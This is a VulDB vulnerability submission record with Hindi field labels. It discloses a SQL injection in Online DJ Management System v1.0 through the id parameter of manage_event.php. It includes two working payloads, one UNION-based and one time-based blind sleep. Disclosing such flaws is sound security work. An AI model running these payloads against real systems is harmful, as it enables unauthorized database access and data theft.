| शीर्षक | Online DJ Management System v1.0 /odjms/admin/events/manage_event.php GET parameter id exists SQL injection vulnerability |
|---|
| विवरण | An issue was discovered in Online DJ Management System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /odjms/admin/events/manage_event.php?id.
Payload1:id=-1' union all select null,null,concat(0x414243,0x7576777879),null,null,null,null-- -
Payload2:id=1' and (select 1 from (select(sleep(15)))l) and 'v'='v |
|---|
| स्रोत | ⚠️ https://github.com/aieouZZ/bug_report/blob/main/SQLi-1.md |
|---|
| उपयोगकर्ता | LiZhang (UID 45734) |
|---|
| सबमिशन | 26/04/2023 11:22 AM (3 साल पहले) |
|---|
| संयम | 28/04/2023 01:19 PM (2 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 227646 [SourceCodester Online DJ Management System 1.0 GET Parameter manage_event.php पहचान SQL इंजेक्शन] |
|---|
| अंक | 19 |
|---|